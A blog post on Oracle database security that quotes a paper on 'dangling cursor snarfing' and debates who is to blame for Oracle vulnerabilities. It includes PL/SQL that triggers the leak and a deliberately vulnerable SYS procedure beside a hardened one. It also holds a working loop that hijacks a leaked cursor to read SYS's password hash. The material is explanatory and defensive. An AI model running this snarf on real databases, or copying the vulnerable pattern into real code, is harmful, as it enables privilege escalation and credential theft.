TagEdge

A view on Oracle Security Issues

Tags: 10g

There are many articles on Oracle security issues, and unsurprisingly you will come across headlines such as "Oracle has more flaws than SQL Server" or "Oracle databases four times worse than Microsoft" on the Web. I just came across a research paper entitled "Dangling Cursor Snarfing: A New Class of Attack in Oracle" (PDF). Some excerpts:

we’ll now execute it as a low privileged user - but when we do so we’ll cause an exception in it by passing it too long a string:

CONNECT SCOTT/TIGER
SET SERVEROUTPUT ON
DECLARE
  X VARCHAR(32000);
  I INTEGER;
BEGIN
  FOR I IN 1..10000 LOOP
    X := 'B' || X;
  END LOOP;
  SYS.PWD_COMPARE(X);
END;
/

This results in the following unhandled exception:

CURSOR: 3
DECLARE
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 12
ORA-06512: at line 8

The session now has a dangling cursor which can be snarfed by an attacker. Note from the output of PWD_COMPARE that the cursor has a value of 3 in this case. Incidentally, even without seeing it's 3 an attacker can still "guess" the value for the dangling cursor by going from 1 to n in a loop until they find it. When the attacker finds the dangling cursor, they can then recycle it. In other words they can rebind the username associated with the query and this time use SYS if they so choose.

My sense is that the research paper above states the attack pessimistically, because the attack rests on the two assumptions below:

1) The database administrator (DBA) and security managers did not do their job (patching and hardening the configuration), and so left an attacker a way to steal confidential data.

2) The users' own mistakes. The PL/SQL that opened the cursor (SYS.PWD_COMPARE in the excerpt above) did not close it when the exception fired, so the handle stayed open in the session for the attacker to find. We therefore need to educate users and developers in using the Oracle database properly.

Given this analysis, why do we need to blame Oracle? If we patch regularly and secure the database configuration, we will be reasonably protected from the above attack.
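To make the excerpt and assumption 2 concrete, here is an added example (written for this post, not code from the paper or from Oracle) of the vulnerable pattern beside its hardened form, followed by the snarfing loop the paper describes. The procedure names pwd_compare_vuln and pwd_compare_safe, and the table SYS.APP_USERS(USERNAME, PASSWORD_HASH), are assumptions for illustration; the paper's own PWD_COMPARE is not reproduced here.

```sql
-- Constructed example for this post: a SYS-owned definer's-rights procedure
-- that opens a DBMS_SQL cursor and, on error, leaves it dangling, beside the
-- hardened version. Table SYS.APP_USERS and both procedure names are assumed.

-- 1. Vulnerable: no exception handler, so any exception raised after
--    OPEN_CURSOR (in the paper's run, ORA-01460 from an oversized argument)
--    skips CLOSE_CURSOR and leaves a SYS-parsed cursor open in the session.
CREATE OR REPLACE PROCEDURE sys.pwd_compare_vuln (p_user IN VARCHAR2)
AUTHID DEFINER AS
  c      INTEGER;
  v_hash VARCHAR2(64);
  n      INTEGER;
BEGIN
  c := DBMS_SQL.OPEN_CURSOR;
  DBMS_OUTPUT.PUT_LINE('CURSOR: ' || c);
  DBMS_SQL.PARSE(c,
    'SELECT password_hash FROM sys.app_users WHERE username = :u',
    DBMS_SQL.NATIVE);
  DBMS_SQL.BIND_VARIABLE(c, ':u', p_user);
  DBMS_SQL.DEFINE_COLUMN(c, 1, v_hash, 64);
  n := DBMS_SQL.EXECUTE(c);
  IF DBMS_SQL.FETCH_ROWS(c) > 0 THEN
    DBMS_SQL.COLUMN_VALUE(c, 1, v_hash);
  END IF;
  DBMS_SQL.CLOSE_CURSOR(c);   -- never reached if anything above raises
END;
/
GRANT EXECUTE ON sys.pwd_compare_vuln TO PUBLIC;

-- 2. Hardened: the handler closes the cursor before re-raising, so nothing
--    is left behind for a later statement in the same session to pick up.
CREATE OR REPLACE PROCEDURE sys.pwd_compare_safe (p_user IN VARCHAR2)
AUTHID DEFINER AS
  c      INTEGER;
  v_hash VARCHAR2(64);
  n      INTEGER;
BEGIN
  c := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(c,
    'SELECT password_hash FROM sys.app_users WHERE username = :u',
    DBMS_SQL.NATIVE);
  DBMS_SQL.BIND_VARIABLE(c, ':u', p_user);
  DBMS_SQL.DEFINE_COLUMN(c, 1, v_hash, 64);
  n := DBMS_SQL.EXECUTE(c);
  IF DBMS_SQL.FETCH_ROWS(c) > 0 THEN
    DBMS_SQL.COLUMN_VALUE(c, 1, v_hash);
  END IF;
  DBMS_SQL.CLOSE_CURSOR(c);
EXCEPTION
  WHEN OTHERS THEN
    -- Close the handle on every failure path, then let the error propagate.
    IF c IS NOT NULL AND DBMS_SQL.IS_OPEN(c) THEN
      DBMS_SQL.CLOSE_CURSOR(c);
    END IF;
    RAISE;
END;
/

-- 3. The snarf, run by the low-privileged caller in the same session right
--    after pwd_compare_vuln has raised: walk candidate handles 1..n, find the
--    one still open, rebind the definer's query to a different username and
--    execute it with SYS's rights.
SET SERVEROUTPUT ON
DECLARE
  v_hash VARCHAR2(64);
  n      INTEGER;
BEGIN
  FOR h IN 1 .. 20 LOOP
    IF DBMS_SQL.IS_OPEN(h) THEN
      DBMS_OUTPUT.PUT_LINE('dangling cursor found: ' || h);
      DBMS_SQL.BIND_VARIABLE(h, ':u', 'SYS');   -- recycle the cursor for SYS
      DBMS_SQL.DEFINE_COLUMN(h, 1, v_hash, 64);
      n := DBMS_SQL.EXECUTE(h);
      IF DBMS_SQL.FETCH_ROWS(h) > 0 THEN
        DBMS_SQL.COLUMN_VALUE(h, 1, v_hash);
        DBMS_OUTPUT.PUT_LINE('hash for SYS: ' || v_hash);
      END IF;
      DBMS_SQL.CLOSE_CURSOR(h);
    END IF;
  END LOOP;
END;
/
```

The difference between the two procedures is only the EXCEPTION block: the patch level and configuration the post recommends narrow the attacker's options, but the cursor itself is closed only if the code that opened it closes it on every exit path. The handle-guessing loop in step 3 works on the 10g release the post is tagged with because IS_OPEN simply returns FALSE for handles that were never opened; on 11g and later, DBMS_SQL raises ORA-29471 when a session probes a cursor number it does not own and disables DBMS_SQL for that session, which is Oracle's own mitigation for this class of attack.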

Meanwhile, Oracle hit back at these security critics with a blog posting responding to the issues above. Some excerpts:

Because software engineering is a complex discipline, the absence of security flaws in released software cannot be fully guaranteed. Such flaws may be detected during internal testing, or may be discovered externally by customers and security researchers. Regardless of who discovers these issues, Oracle’s top priority is to efficiently fix those flaws across all supported platforms in order to allow customers to maintain their security posture. This means that Oracle prioritizes those security flaws in order of severity, regardless of how they were discovered, in order to produce the appropriate fix. This also means that we acknowledge all of the vulnerabilities at the time of the issuance of the appropriate fix (for example, at the time of the Critical Patch Update) and we credit security researchers for any vulnerability they discovered in the Critical Patch Update documentation.

However, we do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing “zero day” exploits, to be irresponsible as they can result in needlessly exposing customers to risk of attack.

My view is that it is too early to say Oracle does not care about fixing its bugs; it is just that customers are dissatisfied with Oracle's security record. On the other hand, I really believe Oracle is getting better at managing the vulnerabilities in its products. If there are reports stating that a bug has been found in Oracle's products, with whom should we find fault? The researchers, who should bear the social responsibility? Oracle, for not releasing the most up-to-date security patch? Or the customers, who do not patch and secure the configuration of their databases? Moreover, if there had been a large-scale attack targeting Oracle databases, we would certainly have heard of Oracle customers switching to the competing products in the market.
